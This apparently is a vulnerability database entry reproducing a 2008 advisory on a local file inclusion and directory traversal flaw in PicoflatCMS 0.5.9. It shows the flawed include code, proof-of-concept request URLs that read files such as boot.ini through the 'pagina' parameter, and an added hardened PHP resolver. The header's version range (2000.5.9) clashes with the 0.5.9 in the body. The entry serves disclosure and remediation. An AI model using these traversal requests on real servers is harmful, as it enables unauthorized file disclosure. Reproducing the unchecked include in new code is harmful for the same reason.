Vendor: PicoflatCMS
By: gmda
CVSS: 7.5 (HIGH)
Local File Inclusion and Directory Traversal
CWE: 22
Product Name: PicoflatCMS
Affected Version From: 2000.5.9
Affected Version To: 2000.5.9
Patch Exists: YES
Related CWE: N/A
CPE: a:picoflat:picoflatcms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2008

Local File Inclusion and Directory Traversal in PicoflatCMS 0.5.9

PicoflatCMS 0.5.9 is vulnerable to Local File Inclusion and Directory Traversal. An attacker can exploit this vulnerability to gain access to sensitive files on the server, such as boot.ini. This is achieved by sending a specially crafted HTTP request whose "pagina" parameter contains directory traversal sequences (e.g. "/./././././././boot.ini"). The vulnerable code is located in the "index.php" file: the only check applied to "$pagina" rejects values containing "://" or "?", so any other value, including a local file path, is passed unchanged to an "include" statement.

Mitigation:

Input validation should be used to prevent directory traversal attacks. All user-supplied input should be validated and filtered for malicious characters.
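
As an added example (not code from PicoflatCMS or from the original advisory), the sketch below sets the page's original check beside an allowlist-plus-containment resolver. The function names `legacy_check_passes` and `resolve_page`, the temporary page directory and the `.php` page naming are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// The page's original test, re-expressed without the removed eregi():
// it only rejects values containing "://" or "?".
function legacy_check_passes(string $pagina): bool
{
    return strpos($pagina, '://') === false && strpos($pagina, '?') === false;
}

// Hypothetical hardened resolver: returns a file inside $baseDir or null.
function resolve_page(string $pagina, string $baseDir): ?string
{
    // 1. Allowlist the name itself: no dots, slashes, backslashes or NUL bytes.
    if (!preg_match('/\A[a-z0-9_-]{1,64}\z/i', $pagina)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // 2. The server, not the client, chooses directory and extension.
    $file = realpath($base . DIRECTORY_SEPARATOR . $pagina . '.php');
    // 3. After symlink resolution the file must still sit under $base.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($file === false || strncmp($file, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return is_file($file) ? $file : null;
}

// Constructed demo: a throwaway page directory holding one page.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'home.php', '<?php echo "home";');

// The second value is the path from the page's p.o.c; the others are constructed.
$samples = ['home', '/./././././././boot.ini', 'home.php', 'a://b', "home\0"];
foreach ($samples as $s) {
    $file = resolve_page($s, $dir);
    printf("%-28s legacy=%-6s hardened=%s\n", json_encode($s),
        legacy_check_passes($s) ? 'passes' : 'blocks',
        $file === null ? 'notfound.php' : basename($file));
}
// In index.php (assumed layout): include the resolved file, else notfound.php.

unlink($dir . DIRECTORY_SEPARATOR . 'home.php');
rmdir($dir);
```

Only `home` resolves to a file; the path from the p.o.c passes the legacy check but is rejected by the resolver before any filesystem access.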

Exploit-DB raw data:

---------------------------------------------------------------------------
type attack: Local File inclusion and the possibility of a
Directory traversal Windows disclosure boot.ini

site name picoflatcms 0.5.9

download http://picoflat.altervista.org/index.php?

by gmda

<!-- gmda@email.it -->


---------------------------------------------------------------------------

bug code

<?php
if (eregi('://', $pagina) || eregi('\?', $pagina)) {
    $pagina = "";
    include "notfound.php";
} else {
    include $pagina;
}
?>

p.o.c

http://127.0.0.1/path/index.php?pagina=/./././././././boot.ini

http://127.0.0.1/path/index.php?pagina=[file]

# milw0rm.com [2008-05-29]